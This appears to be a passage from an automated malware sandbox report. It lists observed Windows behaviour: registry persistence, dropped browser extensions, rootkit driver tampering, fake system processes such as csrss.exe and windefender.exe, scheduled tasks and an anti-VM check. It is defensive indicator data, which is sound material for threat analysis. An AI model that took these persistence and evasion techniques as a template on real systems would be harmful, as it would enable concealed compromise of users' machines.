Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\rVzNwXv.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\rVzNwXv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\KrPQunXfXpAVC\UPAWKJU.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\GpfcWYRxKqUn\KEKMPam.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\MyBurn\is-GACI7.tmp C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\jjltJxfeoRNEg.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\MyBurn\is-N4EIN.tmp C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-VTKBU.tmp C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\MyBurn\is-1RCOJ.tmp C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-SFESJ.tmp C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-SH2J3.tmp C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\oVhJPNkDU\ipYlZgZ.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\MyBurn\is-NBI45.tmp C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File created C:\Program Files (x86)\oVhJPNkDU\jtxeRE.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\yPvhnHM.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-5DLAO.tmp C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\zTVzRhL.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PksooSV.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\KrPQunXfXpAVC\ciyUXWx.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
File created C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-LGLJG.tmp C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\17EC.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20231025045518.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ztlTbPYifermRZH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79072038c960342ab421b8facb933e9000000000200000000001066000000010000200000006b031befe4df06b86704a436c90c73842eb8517552d508f916313bf4ddcac439000000000e8000000002000020000000b6ad9e6181485b4472ad6af7ddb3b069f18c6a82e3ede0ff3480cd03af0fc22f20000000b3f115e2cbe8370970e0b4d683a845f0e4eb030de0e6faf880013d720a091beb40000000fd69a6749a2c2c5edcb6602e12cddfae3dee0e04ab7ab83acc2376930a33b0629b1c4de000fa14dcc396bb618c12aebbdcc3bddc5ddbe00f77c56af32d2a9d58 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79072038c960342ab421b8facb933e9000000000200000000001066000000010000200000007f72c903a29d19cf3ca3739128c92a4898148ae2d712221dc1567d72e6bd5da8000000000e8000000002000020000000b01af758366f14a5dc400268bd9ea7294d9bbcb8185309eedb17311f200465d6900000009ec04fa5d91f64fd8b65e5aa27766ddae34e4b87e135128a3f99581368ce165e30b7e9fcf9a7cf508622b059eb50b9e0ab76addd2951968ce4b53b2b08fdd24487ed87ca74bc9732cf94dcd186adb2aab4c4a94dee1cdd1706290590314ad6d032d6b5d27fb3821859c25457d1ff392af3d98f155264b7419f07c8c470757cd9e724d8410a329d4ff74e7e302dba460d40000000fd0d74ff0acbcbe3a7a229cc774bad9ce04f25e5bf3aa3b7bfc2ebf5d836120297dd5ec7b3706ed15f22d7a06c166e07acc3fe60b4a36c5a345ca73b8f027641 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d06b274cff06da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{83150121-72F2-11EE-AE52-CA07A0C133E5} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "404371524" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-5f-6d-7b-5a-38\WpadDecision = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" C:\Windows\windefender.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" C:\Windows\windefender.exe N/A
